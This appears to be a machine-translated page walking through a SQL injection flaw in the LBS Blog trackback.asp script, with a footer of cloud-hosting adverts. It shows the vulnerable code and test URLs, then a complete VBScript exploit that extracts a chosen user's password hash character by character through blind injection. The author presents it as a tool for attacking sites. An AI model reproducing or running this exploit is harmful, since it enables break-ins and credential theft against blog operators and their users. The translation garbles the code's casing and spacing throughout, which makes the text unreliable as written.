VaR tbentry = {"log_id": input ["ID"],
"Url": input ["url"],
"Title": input ["title"],
"Excerpt": input ["Excerpt"],
"Blog": input ["blog_name"]
}
// These function calllook really horrible
Tbentry. log_id = func. checkint (tbentry. log_id );
Tbentry. url = func. Trim (func. wordfilter (func. checkurl (tbentry. url )));
Tbentry. Title = func. Trim (func. wordfilter (func. trimhtml (func. trimubb (tbentry. Title ))));
Tbentry. Excerpt = func. Trim (func. wordfilter (func. trimhtml (func. trimubb (tbentry. Excerpt ))));
Tbentry. Blog = func. Trim (func. wordfilter (func. trimhtml (func. trimubb (tbentry. Blog ))));
If (tbentry. Title = "") tbentry. Title = tbentry. url;
// Better leave the error messages below in English
If (! Tbentry. log_id)
Trackbackresponse (1, "invalid Article ID ");
If (tbentry. url = "")
Trackbackresponse (1, "source URL is blank ");
If (tbentry. url = false | tbentry. Title = false | tbentry. Excerpt = false | tbentry. Blog = false)
Trackbackresponse (1, "content contains blocked words ");
VaR tmpa = connblog. Query ("select count (log_id) As I from blog_article where log_locked = false and log_mode <4 and log_id =" + tbentry. log_id );
If (tmpa [0] ["I"] = 0) trackbackresponse (1, "Article does not exist or is locked ");
Tmpa = connblog. query ("select count (tb_id) As I from blog_trackback where tb_title = '" + tbentry. title + "'and tb_excerpt ='" + tbentry. excerpt + "'");
If (tmpa [0] ["I"]> 0) trackbackresponse (1, "trackback is already saved ");
// Saving trackback
Note:
Tbentry. log_id = func. checkint (tbentry. log_id );Log_id is checked as int type, but what about URL and excerpt? It's just wordfilter, tril, and HTML sensitive things that have no impact on injection. These things are from
VaR tbentry = {"log_id": input ["ID"],
"Url": input ["url"],
"Title": input ["title"],
"Excerpt": input ["Excerpt"],
"Blog": input ["blog_name"]
}
In input ~~~~, Obviously, an injection!
Because of the special nature of injection, we need to use or, which is a character-type injection.
Http: // 127.0.0.1/aspscripts/lbs2.0.311/lbs/trackback. asp? Url = 1 & id = 1 & blog_name = fffff & excerpt = 1111 '% 20or % 20 '1' = '1
Http: // 127.0.0.1/aspscripts/lbs2.0.311/lbs/trackback. asp? Url = 1 & id = 1 & blog_name = fffff & excerpt = 1111 '% 20or % 20 '1' = '2
This shows the effect.
The identifier is trackback is already saved.
Well, the exploit should also come out.
'================================================ ============================================Set oargs = wscript. Arguments
If oargs. Count <> 2 then call showusage ()
Set olbsxml = Createobject ("Microsoft. XMLHTTP ")
'Fill in the complete target URL
TargetUrl = oargs (0)
If lcase (left (TargetUrl, 7) <> "http: //" then TargetUrl = "http: //" & TargetUrl
If right (TargetUrl, 1) <> "/" then TargetUrl = TargetUrl &"/"
TargetUrl = TargetUrl & "trackback. asp"
Userid = oargs (1)
Tempstr = ""
Charhex = Split (", A, B, C, D, E, F ",",")
Wscript. Echo "lbs blog all version exploit [new injection vulnerability]" & vbcrlf
Wscript. Echo "by Jianxin" & vbcrlf
Wscript. Echo "http://www.loveshell.net /~ _~ I'm really bored... "& vbcrlf
Wscript. Echo "+ Fuck the site now" & vbcrlf
Call Main (TargetUrl, blogname)
Set obokexml = nothing
'---------------------------------------------- Sub -------------------------------------------------------
'================================================ =====
'Function name: Main
'Function function: main program, injection to obtain the password of the blog user
'================================================ =====
Sub main (TargetUrl, blogname)
Dim mainoffset, suboffset, templen, Openurl, getpage
For mainoffset = 1 to 40
For suboffset = 0 to 15
Templen = 0
Postdata = ""
Postdata = "'or (select left (user_password," & mainoffset & ") from blog_user where user_id =" & userid & ") ='" & tempstr & charhex (suboffset) & "'and '1' = '1"
Openurl = TargetUrl
Olbsxml. Open "Post", Openurl, false ,"",""
Olbsxml. setRequestHeader "Content-Type", "application/X-WWW-form-urlencoded"
Olbsxml. Send "url = http://www.loveshell.net/blog/&id=1&blog_name=loveshell_is_my_hero&excerpt=fuck" & escape (postdata)
Getpage = bytestobstr (olbsxml. responsebody)
'Determine whether the accessed page exists
'Wscript. Echo getpage
If instr (getpage, "trackback is already saved") <> 0 then
Tempstr = tempstr & charhex (suboffset)
Wscript. Echo "+ crack now:" & tempstr & string (40-mainoffset ,"? ")
Exit
Elseif instr (getpage, "trackback disabled") <> 0 then
Wscript. Echo vbcrlf & "Something error, not vul" & vbcrlf
Wscript. Quit
End if
Next
Next
Wscript. Echo vbcrlf & "+ We Got it:" & tempstr & vbcrlf & ": P don't be edevil"
End sub
'================================================ =====
'Function name: bytestobstr
'Function: Convert the content in the XMLHTTP object to gb2312 encoding.
'================================================ =====
Function bytestobstr (Body)
Dim objstream
Set objstream = Createobject ("ADODB. Stream ")
Objstream. type = 1
Objstream. mode = 3
Objstream. Open
Objstream. Write body
Objstream. Position = 0
Objstream. type = 2
Objstream. charset = "gb2312"
Bytestobstr = objstream. readtext
Objstream. Close
Set objstream = nothing
End Function
'==================================
'Function name: showusage
'Function: usage tips
'==================================
Sub showusage ()
Wscript. Echo "lbs blog exploit" & vbcrlf & "by loveshell/Jianxin"
Wscript. Echo "Usage:" & vbcrlf & "cscript" & wscript. scriptfullname & "TargetUrl userid"
Wscript. Echo "Example:" & vbcrlf & "cscript" & wscript. scriptfullname & "http://www.loveshell.net/1"
Wscript. Echo ""
Wscript. Quit
End sub
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
